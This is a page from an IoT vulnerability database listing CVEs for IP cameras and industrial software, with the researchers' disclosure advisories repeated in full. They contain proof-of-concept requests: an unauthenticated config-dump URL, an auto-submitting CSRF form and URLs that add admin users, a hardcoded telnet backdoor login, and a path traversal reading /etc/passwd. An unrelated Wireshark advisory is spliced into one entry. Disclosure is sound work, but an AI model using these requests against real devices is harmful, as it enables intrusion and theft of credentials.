VARIoT IoT vulnerabilities database

The Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, exhibits different behavior for NetBIOS user names depending on whether the user account exists, which allows remote authenticated users to enumerate account names via crafted URL parameters. Siemens SIMATIC WinCC is a monitoring control and data acquisition SCADA and human machine interface HMI system. Siemens SIMATIC PCS is a process control system. Siemens SIMATIC WinCC And PCS 7 are prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input. Attackers may exploit this weakness to discern valid usernames. This may aid brute-force password cracking or other attacks. There is a vulnerability in the Web Navigator in Siemens WinCC 7.2 Update 1 and earlier versions used in SIMATIC PCS7 8.0 SP1 and earlier versions and other products

Cross-site scripting (XSS) vulnerability in the portal page in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCue23798. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCue23798. The platform provides functions such as secure access authentication and real-time fault analysis

Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action. Brickcom IP Cameras are IP camera devices. Multiple Brickcom IP Cameras devices have security vulnerabilities that allow remote attackers to exploit vulnerabilities without having to verify direct commit requests for profile information. Brickcom multiple IP cameras including FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, and OSD-040E are prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Brickcom FB-100Ap and so on are network camera products of Brickcom. The vulnerability is caused by the program not properly restricting access to the configfile.dump file. The following network camera models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================ BRICKCOM ==================================================================== ============================================================================ 1.Advisory Information Title: Brickcom 100ap Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiples vulnerabilities have been found in this device. -CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250) 3.Affected Products The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E It\x92s possible others models are affected but they were not checked. -CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1 In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4 -CVE-2013-3690. All firmware checked. 4.PoC 4.1.Authentication Bypass & Clear Text Storage of Sensitive Information CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\x92s not necessary any authentication. _____________________________________________________________________________ http://xx.xx.xx.xx/configfile.dump?action=get _____________________________________________________________________________ The most interesting parameters could be: UserSetSetting.userList.users[n\xba].password= *** UserSetSetting.userList.users[n\xba].name= *** 4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. The following request can exploit this vulnerability _____________________________________________________________________________ <html> <body> <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST"> <input type="hidden" name="action" value="add"> <input type="hidden" name="index" value="0"> <input type="hidden" name="username" value="test2"> <input type="hidden" name="password" value="test2"> <input type="hidden" name="privilege" value="1"> <script>document.gobap.submit();</script> </form> </body> </html> _____________________________________________________________________________ 5.Credits -CVE-2013-3689 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3690 was discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. -2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. (CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one) -2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. -2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible

Fortinet FortiOS before 5.0.3 on FortiGate devices does not properly restrict Guest capabilities, which allows remote authenticated users to read, modify, or delete the records of arbitrary users by leveraging the Guest role. FortiGate running FortiOS is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks. Versions prior to FortiOS 5.0.3 are vulnerable. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. FortiGate is a network security platform. FortiGate is a network security platform. The vulnerability comes from the fact that the program does not properly limit the Guest capabilities

Open redirect vulnerability in the help page in Cisco Video Surveillance Operations Manager allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka Bug ID CSCty74490. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible. This solution can provide secure configuration and management for web portal video, media server instances, cameras, etc. in the IP network

The TP-Link IP Cameras TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6, does not properly restrict access to certain administrative functions, which allows remote attackers to (1) cause a denial of service (device reboot) via a request to cgi-bin/reboot or (2) cause a denial of service (reboot and reset to factory defaults) via a request to cgi-bin/hardfactorydefault. The TP-LINK TL-SC3171 is a network camera product. The TP-LINK TL-SC3171 has an authentication bypass vulnerability. An attacker could exploit this vulnerability to execute arbitrary commands, gain unauthorized access, and bypass security restrictions. TP-LINK TL-SC3171 IP camera is prone to an authentication-bypass vulnerability. Other attacks may also be possible. http://drupal.org/node/207891. The vulnerability is caused by the program not properly restricting access to administrator functions. The following models are affected: TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G

Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users. Brickcom IP Cameras are IP camera devices. A cross-site request forgery vulnerability exists in the Brickcom IP Cameras WEB interface. Allows an attacker to build a malicious URI, entice a user to resolve, and can be used to boost user permissions. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. Brickcom FB-100Ap and so on are network camera products of Brickcom. The following models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E. ============================================================================ BRICKCOM ==================================================================== ============================================================================ 1.Advisory Information Title: Brickcom 100ap Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiples vulnerabilities have been found in this device. -CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250) 3.Affected Products The following products are affected by these vulnerabilities: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E It\x92s possible others models are affected but they were not checked. -CVE-2013-3689. We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1 In the next firmwares, you need to be log-in as administrator to download this file, but the information is in plain text yet: firmwareVersion=v3.1.0.8,v3.1.0.4 -CVE-2013-3690. All firmware checked. 4.PoC 4.1.Authentication Bypass & Clear Text Storage of Sensitive Information CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It\x92s not necessary any authentication. _____________________________________________________________________________ http://xx.xx.xx.xx/configfile.dump?action=get _____________________________________________________________________________ The most interesting parameters could be: UserSetSetting.userList.users[n\xba].password= *** UserSetSetting.userList.users[n\xba].name= *** 4.2.Cross Site Request Forgerty (CSRF) + Privilege Escalation CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. The following request can exploit this vulnerability _____________________________________________________________________________ <html> <body> <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST"> <input type="hidden" name="action" value="add"> <input type="hidden" name="index" value="0"> <input type="hidden" name="username" value="test2"> <input type="hidden" name="password" value="test2"> <input type="hidden" name="privilege" value="1"> <script>document.gobap.submit();</script> </form> </body> </html> _____________________________________________________________________________ 5.Credits -CVE-2013-3689 was discovered by Eliezer Varad\xe9 Lopez, Javier Repiso S\xe1nchez and Jon\xe1s Ropero Castillo. -CVE-2013-3690 was discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities. -2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct. (CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it\x92s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one) -2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities. -2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible

Cross-site scripting (XSS) vulnerability in Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models before firmware 1.0.4.44, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. Unknown cross-site scripting vulnerabilities existed in multiple IP Cameras from Grandstream. Grandstream is an IP phone, network video surveillance solution vendor. The telnet service in multiple Grandstream products uses a built-in account that allows remote attackers to use this account to gain unauthorized access to factory reset or upgrade firmware. The affected products are as follows: GXV3500GXV3501GXV3504GXV3601GXV3601HD/LLGXV3611HD/LLGXV3615W/PGXV3615WP_HDGXV3651FHDGXV3662HD. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Grandstream GXV3501 and others are network camera products of American Grandstream Networks (Grandstream) company. =============================================================================== GRANDSTREAM ==================================================================== =============================================================================== 1.Advisory Information Title: Grandstream Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description The following vulnerability has been found in these devices: -CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443) -CVE-2013-3962. Cross Site Scripting(CWE-79) -CVE-2013-3963. -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Backdoor in Telnet Protocol CVE-2013-3542, Backdoor in Telnet Protocol You should connect via telnet protocol to any camera affected (it's open by default). After all you should be introduce the magic string \x93 !#/ \x94 as Username and as Password. You will get the admin panel setting menu. If you type "help", the following commands are shown: ======================================================= help, quit, status, restart, restore, upgrade, tty_test ======================================================= @@@ restore (Reset settings to factory default) The attacker can take the device control, so it's make this devices very vulnerables. 4.2.Cross Site Scripting (XSS) CVE-2013-3962, Cross Site Scripting non-persistent. _____________________________________________________________________________ http://xx.xx.xx.xx/<script>alert(123)</script> _____________________________________________________________________________ 4.3.Cross Site Request Forgery (CSRF) CVE-2013-3963, CSRF via GET method. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. You should introduce the following URL to replicate the attack. _____________________________________________________________________________ http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 _____________________________________________________________________________ 5.Credits -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. -2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability. -2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities

Cross-site request forgery (CSRF) vulnerability in goform/usermanage in Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models allows remote attackers to hijack the authentication of unspecified victims for requests that add users. The telnet service in multiple Grandstream products uses a built-in account that allows remote attackers to use this account to gain unauthorized access to factory reset or upgrade firmware. Grandstream is an IP phone, network video surveillance solution vendor. There are cross-site request forgery vulnerabilities in multiple products of the Grandstream WEB interface, allowing attackers to build malicious URIs, enticing login users to resolve, and performing malicious operations in the target user context, such as adding new users. The affected products are as follows: GXV3500GXV3501GXV3504GXV3601GXV3601HD/LLGXV3611HD/LLGXV3615W/PGXV3615WP_HDGXV3651FHDGXV3662HD. Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Grandstream GXV3501 and others are network camera products of American Grandstream Networks (Grandstream) company. =============================================================================== GRANDSTREAM ==================================================================== =============================================================================== 1.Advisory Information Title: Grandstream Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description The following vulnerability has been found in these devices: -CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443) -CVE-2013-3962. Cross Site Scripting(CWE-79) -CVE-2013-3963. -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Backdoor in Telnet Protocol CVE-2013-3542, Backdoor in Telnet Protocol You should connect via telnet protocol to any camera affected (it's open by default). After all you should be introduce the magic string \x93 !#/ \x94 as Username and as Password. You will get the admin panel setting menu. If you type "help", the following commands are shown: ======================================================= help, quit, status, restart, restore, upgrade, tty_test ======================================================= @@@ restore (Reset settings to factory default) The attacker can take the device control, so it's make this devices very vulnerables. 4.2.Cross Site Scripting (XSS) CVE-2013-3962, Cross Site Scripting non-persistent. _____________________________________________________________________________ http://xx.xx.xx.xx/<script>alert(123)</script> _____________________________________________________________________________ 4.3.Cross Site Request Forgery (CSRF) CVE-2013-3963, CSRF via GET method. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. You should introduce the following URL to replicate the attack. _____________________________________________________________________________ http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 _____________________________________________________________________________ 5.Credits -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. -2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability. -2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities

plural SONY Network camera products command/user.cgi Contains a cross-site request forgery vulnerability.A third party could hijack the administrator's authentication and add users. Sony CH/DH Series IP Cameras are IP camera devices developed by Sony Corporation. Allows an attacker to build a malicious URI, entice a user to resolve, and perform malicious actions in the target user context, such as adding an administrator account. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks

Cross-site scripting (XSS) vulnerability in Samsung SHR-5162, SHR-5082, and possibly other models, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. The Samsung SHR-5162/SHR-5082 is an IP camera. A cross-site scripting vulnerability exists in Samsung SHR-5162 and SHR-5082. Allows an attacker to build a malicious URI, entice a user to parse, get sensitive information, or hijack a user's session. Note: Very limited information is currently available regarding this issue. We will update this BID as more information emerges. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks

AirLive POE-2600HD allows remote attackers to cause a denial of service (device reset) via a long URL. AirLive POE-2600HD Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Airlive IP Camera is an IP camera device. Airlive IP camera is prone to a remote denial-of-service vulnerability

Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models with firmware 1.0.4.11, have a hardcoded account "!#/" with the same password, which makes it easier for remote attackers to obtain access via a TELNET session. plural Grandstream The product firmware contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream is an IP phone, network video surveillance solution vendor. The affected products are as follows: GXV3500GXV3501GXV3504GXV3601GXV3601HD/LLGXV3611HD/LLGXV3615W/PGXV3615WP_HDGXV3651FHDGXV3662HD. Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to multiple security-bypass vulnerabilities. An attacker may exploit these issues to bypass certain security restrictions and perform unauthorized actions. =============================================================================== GRANDSTREAM ==================================================================== =============================================================================== 1.Advisory Information Title: Grandstream Series Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description The following vulnerability has been found in these devices: -CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443) -CVE-2013-3962. Cross Site Scripting(CWE-79) -CVE-2013-3963. -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Backdoor in Telnet Protocol CVE-2013-3542, Backdoor in Telnet Protocol You should connect via telnet protocol to any camera affected (it's open by default). After all you should be introduce the magic string \x93 !#/ \x94 as Username and as Password. You will get the admin panel setting menu. If you type "help", the following commands are shown: ======================================================= help, quit, status, restart, restore, upgrade, tty_test ======================================================= @@@ restore (Reset settings to factory default) The attacker can take the device control, so it's make this devices very vulnerables. 4.2.Cross Site Scripting (XSS) CVE-2013-3962, Cross Site Scripting non-persistent. _____________________________________________________________________________ http://xx.xx.xx.xx/<script>alert(123)</script> _____________________________________________________________________________ 4.3.Cross Site Request Forgery (CSRF) CVE-2013-3963, CSRF via GET method. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. You should introduce the following URL to replicate the attack. _____________________________________________________________________________ http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0 _____________________________________________________________________________ 5.Credits -CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jon\xe1s Ropero Castillo. 6.Report Timeline -2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. -2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability. -2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201308-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Wireshark: Multiple vulnerabilities Date: August 28, 2013 Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694 ID: 201308-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Wireshark, allowing remote attackers to execute arbitrary code or cause Denial of Service. Background ========== Wireshark is a versatile network protocol analyzer. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/wireshark < 1.10.1 >= 1.10.1 *>= 1.8.9 Description =========== Multiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== All Wireshark 1.10 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1" All Wireshark 1.8 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9" References ========== [ 1 ] CVE-2012-0041 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041 [ 2 ] CVE-2012-0042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042 [ 3 ] CVE-2012-0043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043 [ 4 ] CVE-2012-0066 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066 [ 5 ] CVE-2012-0067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067 [ 6 ] CVE-2012-0068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068 [ 7 ] CVE-2012-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548 [ 8 ] CVE-2012-4048 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048 [ 9 ] CVE-2012-4049 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049 [ 10 ] CVE-2012-4285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285 [ 11 ] CVE-2012-4286 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286 [ 12 ] CVE-2012-4287 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287 [ 13 ] CVE-2012-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288 [ 14 ] CVE-2012-4289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289 [ 15 ] CVE-2012-4290 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290 [ 16 ] CVE-2012-4291 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291 [ 17 ] CVE-2012-4292 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292 [ 18 ] CVE-2012-4293 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293 [ 19 ] CVE-2012-4294 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294 [ 20 ] CVE-2012-4295 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295 [ 21 ] CVE-2012-4296 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296 [ 22 ] CVE-2012-4297 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297 [ 23 ] CVE-2012-4298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298 [ 24 ] CVE-2013-3540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540 [ 25 ] CVE-2013-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541 [ 26 ] CVE-2013-3542 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542 [ 27 ] CVE-2013-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555 [ 28 ] CVE-2013-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556 [ 29 ] CVE-2013-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557 [ 30 ] CVE-2013-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558 [ 31 ] CVE-2013-3559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559 [ 32 ] CVE-2013-4074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074 [ 33 ] CVE-2013-4075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075 [ 34 ] CVE-2013-4076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076 [ 35 ] CVE-2013-4077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077 [ 36 ] CVE-2013-4078 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078 [ 37 ] CVE-2013-4079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079 [ 38 ] CVE-2013-4080 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080 [ 39 ] CVE-2013-4081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081 [ 40 ] CVE-2013-4082 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082 [ 41 ] CVE-2013-4083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083 [ 42 ] CVE-2013-4920 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920 [ 43 ] CVE-2013-4921 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921 [ 44 ] CVE-2013-4922 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922 [ 45 ] CVE-2013-4923 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923 [ 46 ] CVE-2013-4924 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924 [ 47 ] CVE-2013-4925 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925 [ 48 ] CVE-2013-4926 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926 [ 49 ] CVE-2013-4927 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927 [ 50 ] CVE-2013-4928 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928 [ 51 ] CVE-2013-4929 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929 [ 52 ] CVE-2013-4930 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930 [ 53 ] CVE-2013-4931 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931 [ 54 ] CVE-2013-4932 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932 [ 55 ] CVE-2013-4933 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933 [ 56 ] CVE-2013-4934 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934 [ 57 ] CVE-2013-4935 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935 [ 58 ] CVE-2013-4936 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201308-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD, and possibly other camera models use cleartext to store sensitive information, which allows attackers to obtain passwords, user names, and other sensitive information by reading an unspecified backup file. Airlive IP Camera is an IP camera device. Multiple Airlive IP Cameras are prone to an information-disclosure vulnerability. Information obtained will aid in further attacks. =========================================================================== AIRLIVE ==================================================================== =========================================================================== 1.Advisory Information Title: Airlive Multiple Vulnerabilities Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description Multiple vulnerabilities have been found in this devices: -CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103) -CVE-2013-3541. Relative Path Traversal(CWE-23). -CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Priveleges and Access Controls(CWE-264) -CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312) -CVE-2013-3691. Denial of Service 3.Affected Products CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD. It\x92s possible others models are affected but they were not checked. 4.PoC 4.1.Cross Site Request Forgery (CSRF) CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters. In the following example we will make a vector to create an alternative user with administration credentials. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect= _____________________________________________________________________________ 4.2.Relative Path Traversal CVE-2013-3541, Transversal Path that\x92s allow you to read file system configuration. _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd _____________________________________________________________________________ 4.3.Sensitive Information Exposure + Privilege Escalation CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL _____________________________________________________________________________ http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID _____________________________________________________________________________ We can decode Admin password (base64). You can open with any text editor and look for user's information for example, passwords, users and so on. 4.5.Denial of Service (DoS) Use CVE-2013-3691, DoS by overbuffing path \x91/\x92. A request with a large number of \x91a\x92 can take down the http service from the camera device. _____________________________________________________________________________ Request: 